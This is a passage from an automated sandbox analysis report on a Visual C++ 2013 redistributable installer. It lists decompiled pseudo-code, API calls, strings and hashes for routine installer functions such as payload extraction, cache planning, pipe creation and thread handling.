									 *((intOrPtr*)( *_t48 + _t109 + 0xc)) =  *((intOrPtr*)( *_t48 + _t109 + 0xc)) + 1;
									_t51 = _t145 + 0x4c; // 0xa00815ff
									_t53 = _t109 + 0x10; // 0xa008160f
									_t141 =  *_v20;
									_t143 =  *((intOrPtr*)(_t141 + 0x10));
									 *((intOrPtr*)( *_t51 + _t53)) =  *((intOrPtr*)( *_t51 + _t53)) +  *((intOrPtr*)(_t141 + 0x10));
									_t130 =  *(_t141 + 0x14);
									asm("adc [eax+0x4], ecx");
									_v16 =  &(_v16->nLength);
									__eflags = _v16 -  *(_t144 + 0x80);
									if(__eflags < 0) {
										continue;
									}
									goto L22;
								}
								_push("Failed to append payload cache action.");
								goto L25;
							}
							_t88 = E0129399C(_t130, _t145, __eflags,  &_v12);
							_v8 = _t88;
							__eflags = _t88;
							if(_t88 >= 0) {
								_t113 = _v12;
								 *_t113 = 5;
								 *((intOrPtr*)(_t113 + 8)) = _t144;
								goto L19;
							}
							L17:
							_push("Failed to append rollback cache action.");
							goto L25;
						}
						goto L11;
					}
					_t88 = E0129399C(_t130, _t145, _t152,  &_v12);
					_v8 = _t88;
					_t153 = _t88;
					if(_t88 < 0) {
						goto L17;
					}
					_t115 = _v12;
					 *_t115 = 1;
					_t115[2] = _t124;
					goto L10;
				} else {
					_v16 = 0;
					do {
						_t6 = _t145 + 0x4c; // 0xa00815ff
						_t117 =  *_t6 + _v16;
						if( *_t117 != 4) {
							goto L5;
						}
						if(CompareStringW(_t130, _t130,  *( *(_t117 + 8)), 0xffffffff, _v20, 0xffffffff) == 2) {
							_t23 = _t123 + 1; // 0x1
							_t24 = _t145 + 0x50; // 0xc085012b
							__eflags = _t23 -  *_t24;
							if(_t23 <  *_t24) {
								_t25 = _t145 + 0x4c; // 0xa00815ff
								_t121 =  *_t25;
								_t129 = _t123 * 0x28;
								__eflags =  *((intOrPtr*)(_t121 + _t129 + 0x28)) - 6;
								if( *((intOrPtr*)(_t121 + _t129 + 0x28)) == 6) {
									 *_a4 =  *(_t121 + _t129 + 0x30);
								}
							}
							L35:
							return _v8;
						}
						_t130 = 0;
						L5:
						_v16 = _v16 + 0x28;
						_t123 = _t123 + 1;
						_t12 = _t145 + 0x50; // 0xc085012b
						_t150 = _t123 -  *_t12;
					} while (_t123 <  *_t12);
					goto L6;
				}
			}

0x012953d2
0x012953d2
0x012953d9
0x012953dc
0x012953e0
0x012953e2
0x012953e5
0x012953e8
0x012953ee
0x01295423
0x01295423
0x01295429
0x01295433
0x01295438
0x0129543d
0x0129547c
0x0129547c
0x0129558f
0x0129558f
0x012955f0
0x012955f0
0x00000000
0x012955f6
0x0129543f
0x01295442
0x01295448
0x0129544b
0x0129544e
0x0129546c
0x01295470
0x01295475
0x0129547a
0x012954b1
0x012954b4
0x012954ba
0x012954bd
0x012954c0
0x012954c1
0x012954c4
0x012954ec
0x012954ec
0x012954f0
0x012954f7
0x0129554e
0x01295552
0x01295557
0x0129555a
0x0129555c
0x0129558a
0x0129558a
0x00000000
0x0129558a
0x0129555e
0x01295564
0x0129556a
0x0129556d
0x01295570
0x01295574
0x0129557c
0x01295583
0x01295586
0x01295588
0x01295599
0x012955a1
0x012955a7
0x012955ad
0x012955b0
0x012955b2
0x012955fc
0x012955fe
0x01295603
0x01295607
0x01295607
0x0129560a
0x00000000
0x0129560a
0x012955b4
0x012955ba
0x012955bc
0x012955c3
0x012955c3
0x012955c3
0x012955c8
0x012955cb
0x012955cd
0x012955cf
0x012955cf
0x012955e3
0x012955e8
0x012955ed
0x00000000
0x012955ed
0x00000000
0x00000000
0x00000000
0x00000000
0x012954f9
0x012954f9
0x01295507
0x0129550f
0x01295514
0x01295517
0x01295519
0x00000000
0x00000000
0x0129551b
0x01295520
0x01295527
0x01295529
0x0129552c
0x01295533
0x01295535
0x01295538
0x0129553a
0x0129553d
0x01295540
0x01295546
0x0129554c
0x00000000
0x00000000
0x00000000
0x0129554c
0x01295592
0x00000000
0x01295592
0x012954ca
0x012954cf
0x012954d2
0x012954d4
0x012954e0
0x012954e3
0x012954e9
0x00000000
0x012954e9
0x012954d6
0x012954d6
0x00000000
0x012954d6
0x00000000
0x0129547a
0x01295454
0x01295459
0x0129545c
0x0129545e
0x00000000
0x00000000
0x01295460
0x01295463
0x01295469
0x00000000
0x012953f0
0x012953f0
0x012953f3
0x012953f3
0x012953f6
0x012953fc
0x00000000
0x00000000
0x01295415
0x01295486
0x01295489
0x01295489
0x0129548c
0x01295492
0x01295492
0x01295495
0x01295498
0x0129549d
0x012954aa
0x012954aa
0x0129549d
0x0129560d
0x01295613
0x01295613
0x01295417
0x01295419
0x01295419
0x0129541d
0x0129541e
0x0129541e
0x0129541e
0x00000000
0x012953f3

APIs

CompareStringW.KERNEL32(00000000,00000000,?,000000FF,012816FB,000000FF,?,00000000,012816FB), ref: 0129540C
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0128139F,0128139F,0128139F,0128139F,?,00000000,012816FB), ref: 012955A7
GetLastError.KERNEL32 ref: 012955B4

Strings

Failed to append package start action., xrefs: 0129547C
(, xrefs: 01295419
Failed to create syncpoint event., xrefs: 012955E8
Failed to append rollback cache action., xrefs: 012954D6
Failed to append cache action., xrefs: 0129558A
plan.cpp, xrefs: 012955DE
Failed to append payload cache action., xrefs: 01295592

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareCreateErrorEventLastString
String ID: ($Failed to append cache action.$Failed to append package start action.$Failed to append payload cache action.$Failed to append rollback cache action.$Failed to create syncpoint event.$plan.cpp
API String ID: 801187047-794669014
Opcode ID: c455e899f6b3ab1765676fbd3dfba886fa7f9c886c604da3c1a3b3f763bca3d6
Instruction ID: f5b825a75c8768288b2dc34d9db9a9d21da1749157f267a36ae773153a70047e
Opcode Fuzzy Hash: c455e899f6b3ab1765676fbd3dfba886fa7f9c886c604da3c1a3b3f763bca3d6
Instruction Fuzzy Hash: 1E713970A20306EFCB16DFA8D885AA9BBF9FF08304F1045AAD615DB251E774EA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012851BD Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E012851BD(void* __ecx, void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				char _v16;
				short* _v20;
				void* __ebx;
				intOrPtr _t43;
				intOrPtr _t51;
				intOrPtr _t58;
				intOrPtr* _t60;
				intOrPtr* _t61;
				void* _t62;
				intOrPtr _t63;
				void* _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t74;

				_t66 = __edx;
				_t62 = __ecx;
				_t60 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				while(1) {
					_t68 = E012A006B(_a12,  &_v8);
					if(_t68 == 0x80070103) {
						break;
					}
					if(_t68 < 0) {
						_push("Failed to get next stream.");
						goto L33;
					} else {
						_t69 = 0;
						_v20 = _v8;
						if( *((intOrPtr*)(_t60 + 4)) <= 0) {
							L10:
							_t68 = 0x80070490;
						} else {
							_a4 = _a4 & 0;
							do {
								_t74 =  *_t60 + _a4;
								if( *((intOrPtr*)(_t74 + 4)) != 2) {
									goto L9;
								} else {
									_t58 = _a8;
									if(_t58 == 0 ||  *((intOrPtr*)(_t74 + 0x3c)) == _t58) {
										_t17 = _t74 + 0x38; // 0xfffffee3
										if(CompareStringW(0x7f, 0,  *_t17, 0xffffffff, _v20, 0xffffffff) == 2) {
											_v12 = _t74;
											_t68 = 0;
										} else {
											goto L9;
										}
									} else {
										goto L9;
									}
								}
								goto L11;
								L9:
								_a4 = _a4 + 0x58;
								_t69 = _t69 + 1;
								_t20 = _t60 + 4; // 0x15ff3675
							} while (_t69 <  *_t20);
							goto L10;
						}
						L11:
						if(_t68 < 0) {
							_push(_v8);
							_push("Failed to find embedded payload: %ls");
							_push(_t68);
							L26:
							E012AFA86();
						} else {
							_t51 = _v12;
							_t72 = _v12 + 0x50;
							_t23 = _t51 + 0x18; // 0xf08b8007
							_t68 = E012B201F(_t62, _t66, _a16,  *_t23, _v12 + 0x50);
							if(_t68 < 0) {
								_push("Failed to concat file paths.");
								goto L33;
							} else {
								_t68 = E012B195B(_t60,  *_t72,  &_v16);
								if(_t68 < 0) {
									_push("Failed to get directory portion of local file path");
									goto L33;
								} else {
									_t68 = E012B65D3(_v16, 0);
									if(_t68 < 0) {
										_push("Failed to ensure directory exists");
										goto L33;
									} else {
										_t68 = E012A0086(_a12,  *_t72);
										if(_t68 < 0) {
											_push("Failed to extract file.");
											L33:
											_push(_t68);
											E012AFA86();
										} else {
											 *((intOrPtr*)(_v12 + 0x4c)) = 1;
											continue;
										}
									}
								}
							}
						}
					}
					L34:
					if(_v8 != 0) {
						E012B01E8(_v8);
					}
					if(_v16 != 0) {
						E012B01E8(_v16);
					}
					return _t68;
				}
				_t31 = _t60 + 4; // 0x15ff3675
				_t43 =  *_t31;
				_t68 = 0;
				_t67 = 0;
				if(_t43 != 0) {
					_t61 =  *_t60;
					do {
						_t63 = _a8;
						if(_t63 == 0 ||  *((intOrPtr*)(_t61 + 0x3c)) == _t63) {
							if( *((intOrPtr*)(_t61 + 0x4c)) < 1) {
								_t68 = 0x8007000d;
								E012B294E(_t43, "payload.cpp", 0x116, 0x8007000d);
								_push( *_t61);
								_push("Payload was not found in container: %ls");
								_push(0x8007000d);
								goto L26;
							} else {
								goto L23;
							}
						} else {
							goto L23;
						}
						goto L34;
						L23:
						_t67 = _t67 + 1;
						_t61 = _t61 + 0x58;
					} while (_t67 < _t43);
				}
				goto L34;
			}

0x012851bd
0x012851bd
0x012851c4
0x012851cb
0x012851ce
0x012851d1
0x012851d4
0x012851e0
0x012851e8
0x00000000
0x00000000
0x012851f0
0x01285315
0x00000000
0x012851f6
0x012851f9
0x012851fb
0x01285201
0x01285244
0x01285244
0x01285203
0x01285203
0x01285206
0x01285208
0x0128520f
0x00000000
0x01285211
0x01285211
0x01285216
0x01285224
0x01285234
0x012852bc
0x012852bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01285216
0x00000000
0x0128523a
0x0128523a
0x0128523e
0x0128523f
0x0128523f
0x00000000
0x01285206
0x01285249
0x0128524b
0x0128531c
0x0128531f
0x01285324
0x0128530b
0x0128530b
0x01285251
0x01285254
0x01285257
0x0128525b
0x01285266
0x0128526a
0x01285327
0x00000000
0x01285270
0x0128527b
0x0128527f
0x0128532e
0x00000000
0x01285285
0x0128528f
0x01285293
0x01285335
0x00000000
0x01285299
0x012852a3
0x012852a7
0x0128533c
0x01285341
0x01285341
0x01285342
0x012852ad
0x012852b0
0x00000000
0x012852b0
0x012852a7
0x01285293
0x0128527f
0x0128526a
0x0128524b
0x01285349
0x0128534d
0x01285352
0x01285352
0x0128535b
0x01285360
0x01285360
0x0128536b
0x0128536b
0x012852c3
0x012852c3
0x012852c6
0x012852c8
0x012852cc
0x012852ce
0x012852d0
0x012852d0
0x012852d5
0x012852e0
0x012852fc
0x012852fe
0x01285303
0x01285305
0x0128530a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x012852e2
0x012852e2
0x012852e3
0x012852e6
0x012852ea
0x00000000

APIs

CompareStringW.KERNEL32(0000007F,00000000,FFFFFEE3,000000FF,01282146,000000FF,01282146,01281F0E,01282146,012821D2,01281E8E,00000000,012821D2,01281E8E,01281E22,F08B8007), ref: 0128522B

Strings

payload.cpp, xrefs: 012852F7
Failed to get next stream., xrefs: 01285315
Payload was not found in container: %ls, xrefs: 01285305
Failed to find embedded payload: %ls, xrefs: 0128531F
X, xrefs: 0128523A
Failed to ensure directory exists, xrefs: 01285335
Failed to concat file paths., xrefs: 01285327
Failed to extract file., xrefs: 0128533C
Failed to get directory portion of local file path, xrefs: 0128532E

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CompareString
String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$X$payload.cpp
API String ID: 1825529933-3888727562
Opcode ID: 12e33be634f2953081f23808da16be4718f765da1d092343ffb8e045a9e1bac8
Instruction ID: 01298ac4eca3fbbd55c3ff0b2f67807791bc3ea96a0f9f0ecf60ce52d6b93a34
Opcode Fuzzy Hash: 12e33be634f2953081f23808da16be4718f765da1d092343ffb8e045a9e1bac8
Instruction Fuzzy Hash: 1F412731971606EBDF12AF55CC81AEE7B72BF547A0F248069F615AB2D0DBB1D940CB40

Uniqueness

Uniqueness Score: -1.00%

Function 012828DB Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

UuidCreate.RPCRT4(?), ref: 01282912
StringFromGUID2.OLE32(?,?,00000027), ref: 01282925

Strings

BurnPipe.%s, xrefs: 01282943
Failed to allocate pipe secret., xrefs: 012829C8
Failed to convert pipe guid into string., xrefs: 012829AB
pipe.cpp, xrefs: 01282971, 012829A1
Failed to create pipe guid., xrefs: 0128297B
Failed to allocate pipe name., xrefs: 01282957

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CreateFromStringUuid
String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
API String ID: 4041566446-2510341293
Opcode ID: 48b9598b2e1373396a7a71190c397d2af3efef01de58862845629ab71a6a93fb
Instruction ID: 3799d3e0a30c1ab0b6f464606838d3aa7c6a1cc5c3bfe9574dccbd71eeba1930
Opcode Fuzzy Hash: 48b9598b2e1373396a7a71190c397d2af3efef01de58862845629ab71a6a93fb
Instruction Fuzzy Hash: E4317232D2131DEBDB21EBE5CD85AEEB7BCAF04790F204126E509FB140D6B49905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0129638E Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 98
threadCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0129638E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				void* _t23;
				void* _t29;
				int _t31;
				signed int _t33;
				signed int _t36;
				signed int _t45;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v8 = 0;
				_t23 = CreateEventW(0, 1, 0, 0);
				_v16 = _t23;
				if(_t23 != 0) {
					_v32 = _t23;
					_v28 = _a4;
					_v24 = _a8;
					_v20 = _a12;
					_t29 = CreateThread(0, 0, 0x12961cc,  &_v32, 0,  &_v8);
					_v12 = _t29;
					if(_t29 != 0) {
						_t31 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
					} else {
						_t33 = GetLastError();
						if(_t33 > 0) {
							_t33 = _t33 & 0x0000ffff | 0x80070000;
						}
						_t45 = _t33;
						if(_t45 >= 0) {
							_t45 = 0x80004005;
						}
						E012B294E(_t33, "splashscreen.cpp", 0x4a, _t45);
						_push("Failed to create UI thread.");
						goto L12;
					}
				} else {
					_t36 = GetLastError();
					if(_t36 > 0) {
						_t36 = _t36 & 0x0000ffff | 0x80070000;
					}
					_t45 = _t36;
					if(_t45 >= 0) {
						_t45 = 0x80004005;
					}
					E012B294E(_t36, "splashscreen.cpp", 0x41, _t45);
					_push("Failed to create modal event.");
					L12:
					_push(_t45);
					_t31 = E012AFA86();
				}
				if(_v12 != 0) {
					_t31 = CloseHandle(_v12);
					_v12 = 0;
				}
				if(_v16 != 0) {
					return CloseHandle(_v16);
				}
				return _t31;
			}

0x0129639b
0x0129639c
0x0129639d
0x0129639e
0x012963a4
0x012963a5
0x012963ad
0x012963b0
0x012963b6
0x012963bb
0x012963f0
0x012963f6
0x012963fc
0x01296402
0x01296415
0x0129641b
0x01296420
0x01296466
0x01296422
0x01296422
0x0129642a
0x01296431
0x01296431
0x01296436
0x0129643a
0x0129643c
0x0129643c
0x01296449
0x0129644e
0x00000000
0x0129644e
0x012963bd
0x012963bd
0x012963c5
0x012963cc
0x012963cc
0x012963d1
0x012963d5
0x012963d7
0x012963d7
0x012963e4
0x012963e9
0x01296453
0x01296453
0x01296454
0x0129645a
0x01296475
0x0129647a
0x0129647c
0x0129647c
0x01296482
0x00000000
0x01296487
0x0129648c

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,01281E12,?), ref: 012963B0
GetLastError.KERNEL32(?,?,?,01281E12,?), ref: 012963BD
CreateThread.KERNEL32 ref: 01296415
GetLastError.KERNEL32(?,?,?,01281E12,?), ref: 01296422
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,01281E12,?), ref: 01296466
CloseHandle.KERNEL32(00000001,?,?,?,01281E12,?), ref: 0129647A
CloseHandle.KERNEL32(?,?,?,?,01281E12,?), ref: 01296487

Strings

splashscreen.cpp, xrefs: 012963DF, 01296444
Failed to create UI thread., xrefs: 0129644E
Failed to create modal event., xrefs: 012963E9

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
API String ID: 2351989216-1977201954
Opcode ID: b0d18b3f0871072af67df66a236186d5eef65b655914bbac6ca60e346cc2fa3f
Instruction ID: 0d7116287cb418d4bb034027c0f83ff22fa8e0b110d1864b6daf8ff7dd33e62e
Opcode Fuzzy Hash: b0d18b3f0871072af67df66a236186d5eef65b655914bbac6ca60e346cc2fa3f
Instruction Fuzzy Hash: 4F31E472D20216BEDB319BACDC499BEBFF5EB84B50F204129EA15F3240E2754A408B91

Uniqueness

Uniqueness Score: -1.00%

Function 012A5BB3 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90
threadCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E012A5BB3(void* __esi) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t27;
				signed int _t30;
				signed int _t36;
				signed int _t39;

				asm("stosd");
				asm("stosd");
				_v16 =  *(__esi + 0x28);
				_v12 =  *(__esi + 0x20);
				_v8 = 0;
				_t27 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
				if(_t27 == 0) {
					if(ResetEvent( *(__esi + 0x28)) != 0) {
						 *((intOrPtr*)(__esi + 0x2c)) = 0;
					} else {
						_t30 = GetLastError();
						if(_t30 > 0) {
							_t30 = _t30 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t30;
						if(_t30 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t30, "cabextract.cpp", 0x146, _v8);
						_push("Failed to reset operation complete event.");
						goto L7;
					}
				} else {
					if(_t27 == 1) {
						if(GetExitCodeThread( *(__esi + 0x20),  &_v8) == 0) {
							_t36 = GetLastError();
							if(_t36 > 0) {
								_t36 = _t36 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t36;
							if(_t36 >= 0) {
								_v8 = 0x80004005;
							}
							E012B294E(_t36, "cabextract.cpp", 0x14d, _v8);
							_push("Failed to get extraction thread exit code.");
							goto L7;
						}
					} else {
						_t39 = GetLastError();
						if(_t39 > 0) {
							_t39 = _t39 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t39;
						if(_t39 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t39, "cabextract.cpp", 0x153, _v8);
						_push("Failed to wait for operation complete event.");
						L7:
						_push(_v8);
						E012AFA86();
					}
				}
				return _v8;
			}

0x012a5bc0
0x012a5bc1
0x012a5bc5
0x012a5bcf
0x012a5bd9
0x012a5bdc
0x012a5be4
0x012a5c92
0x012a5cd2
0x012a5c94
0x012a5c94
0x012a5c9c
0x012a5ca3
0x012a5ca3
0x012a5ca8
0x012a5cad
0x012a5caf
0x012a5caf
0x012a5cc3
0x012a5cc8
0x00000000
0x012a5cc8
0x012a5bea
0x012a5bed
0x012a5c46
0x012a5c4c
0x012a5c54
0x012a5c5b
0x012a5c5b
0x012a5c60
0x012a5c65
0x012a5c67
0x012a5c67
0x012a5c7b
0x012a5c80
0x00000000
0x012a5c80
0x012a5bef
0x012a5bef
0x012a5bf7
0x012a5bfe
0x012a5bfe
0x012a5c03
0x012a5c08
0x012a5c0a
0x012a5c0a
0x012a5c1e
0x012a5c23
0x012a5c28
0x012a5c28
0x012a5c2b
0x012a5c31
0x012a5bed
0x012a5cdb

APIs

WaitForMultipleObjects.KERNEL32(00000002,01281D72,00000000,000000FF,76CDF5E0,00000000,01281D72,?), ref: 012A5BDC
GetLastError.KERNEL32 ref: 012A5BEF
GetExitCodeThread.KERNEL32(?,000000FF), ref: 012A5C3E
GetLastError.KERNEL32 ref: 012A5C4C
ResetEvent.KERNEL32(?), ref: 012A5C8A
GetLastError.KERNEL32 ref: 012A5C94

Strings

Failed to reset operation complete event., xrefs: 012A5CC8
Failed to wait for operation complete event., xrefs: 012A5C23
cabextract.cpp, xrefs: 012A5C19, 012A5C76, 012A5CBE
Failed to get extraction thread exit code., xrefs: 012A5C80

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
API String ID: 2979751695-3400260300
Opcode ID: c8c595e849f97d93196747a4e18322cdbeafb5fc9894931dc4375662defcc170
Instruction ID: 8b82a6ef2ad198404a5e4f32e5936d85177077b887865bab0f2ad225b8a5bc55
Opcode Fuzzy Hash: c8c595e849f97d93196747a4e18322cdbeafb5fc9894931dc4375662defcc170
Instruction Fuzzy Hash: 8631D172A6030AFFDB209FA4DD899AEBBB2AB04710F60063DE305E6054E3759B009B40

Uniqueness

Uniqueness Score: -1.00%

Function 012A5AA9 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 89
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E012A5AA9(void* __ecx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				void* _t23;
				void* _t24;
				void* _t25;
				signed int _t35;
				signed int _t39;
				void* _t48;
				intOrPtr _t52;

				_t48 = __edi;
				_t52 = _a4;
				_v8 = 0;
				if( *(_t52 + 0x20) != 0) {
					_t4 = _t52 + 0x24; // 0x526a5680
					 *((intOrPtr*)(_t52 + 0x2c)) = 5;
					if(SetEvent( *_t4) != 0) {
						_t9 = _t52 + 0x20; // 0x4005be
						if(WaitForSingleObject( *_t9, 0xffffffff) != 0) {
							_t35 = GetLastError();
							if(_t35 > 0) {
								_t35 = _t35 & 0x0000ffff | 0x80070000;
							}
							_v8 = _t35;
							if(_t35 >= 0) {
								_v8 = 0x80004005;
							}
							E012B294E(_t35, "cabextract.cpp", 0x113, _v8);
							_push("Failed to wait for thread to terminate.");
							goto L13;
						}
					} else {
						_t39 = GetLastError();
						if(_t39 > 0) {
							_t39 = _t39 & 0x0000ffff | 0x80070000;
						}
						_v8 = _t39;
						if(_t39 >= 0) {
							_v8 = 0x80004005;
						}
						E012B294E(_t39, "cabextract.cpp", 0x10d, _v8);
						_push("Failed to set begin operation event.");
						L13:
						_push(_v8);
						E012AFA86();
					}
				}
				_t14 = _t52 + 0x20; // 0x4005be
				_t23 =  *_t14;
				_push(_t48);
				if(_t23 != 0) {
					CloseHandle(_t23);
					 *(_t52 + 0x20) = 0;
				}
				_t16 = _t52 + 0x24; // 0x526a5680
				_t24 =  *_t16;
				if(_t24 != 0) {
					CloseHandle(_t24);
					 *(_t52 + 0x24) = 0;
				}
				_t18 = _t52 + 0x28; // 0x2bad1468
				_t25 =  *_t18;
				if(_t25 != 0) {
					CloseHandle(_t25);
					 *(_t52 + 0x28) = 0;
				}
				_t20 = _t52 + 0x4c; // 0x1c74bc45
				_t26 =  *_t20;
				if( *_t20 != 0) {
					E012B24F6(_t26);
				}
				_t21 = _t52 + 0x1c; // 0x578f685
				_t53 =  *_t21;
				if( *_t21 != 0) {
					E012B01E8(_t53);
				}
				return _v8;
			}

0x012a5aa9
0x012a5aaf
0x012a5ab4
0x012a5aba
0x012a5ac0
0x012a5ac3
0x012a5ad2
0x012a5b11
0x012a5b1c
0x012a5b1e
0x012a5b26
0x012a5b2d
0x012a5b2d
0x012a5b32
0x012a5b37
0x012a5b39
0x012a5b39
0x012a5b4d
0x012a5b52
0x00000000
0x012a5b52
0x012a5ad4
0x012a5ad4
0x012a5adc
0x012a5ae3
0x012a5ae3
0x012a5ae8
0x012a5aed
0x012a5aef
0x012a5aef
0x012a5b03
0x012a5b08
0x012a5b57
0x012a5b57
0x012a5b5a
0x012a5b60
0x012a5ad2
0x012a5b61
0x012a5b61
0x012a5b64
0x012a5b6d
0x012a5b70
0x012a5b72
0x012a5b72
0x012a5b75
0x012a5b75
0x012a5b7a
0x012a5b7d
0x012a5b7f
0x012a5b7f
0x012a5b82
0x012a5b82
0x012a5b87
0x012a5b8a
0x012a5b8c
0x012a5b8c
0x012a5b8f
0x012a5b8f
0x012a5b95
0x012a5b98
0x012a5b98
0x012a5b9d
0x012a5b9d
0x012a5ba2
0x012a5ba5
0x012a5ba5
0x012a5bb0

APIs

SetEvent.KERNEL32(526A5680,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000), ref: 012A5ACA
GetLastError.KERNEL32(?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000,?,01281E22,2BAB1868), ref: 012A5AD4
WaitForSingleObject.KERNEL32(004005BE,000000FF,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000,?), ref: 012A5B14
GetLastError.KERNEL32(?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12,00000000,?,01281E22,2BAB1868), ref: 012A5B1E
CloseHandle.KERNEL32(004005BE,00000000,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12), ref: 012A5B70
CloseHandle.KERNEL32(526A5680,00000000,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12), ref: 012A5B7D
CloseHandle.KERNEL32(2BAD1468,00000000,01282222,01281E22,?,?,012A00ED,01282222,00000000,01281AAE,?,0128D97B,?,01281AAE,01281E12,01281E12), ref: 012A5B8A

Strings

Failed to set begin operation event., xrefs: 012A5B08
cabextract.cpp, xrefs: 012A5AFE, 012A5B48
Failed to wait for thread to terminate., xrefs: 012A5B52

Memory Dump Source

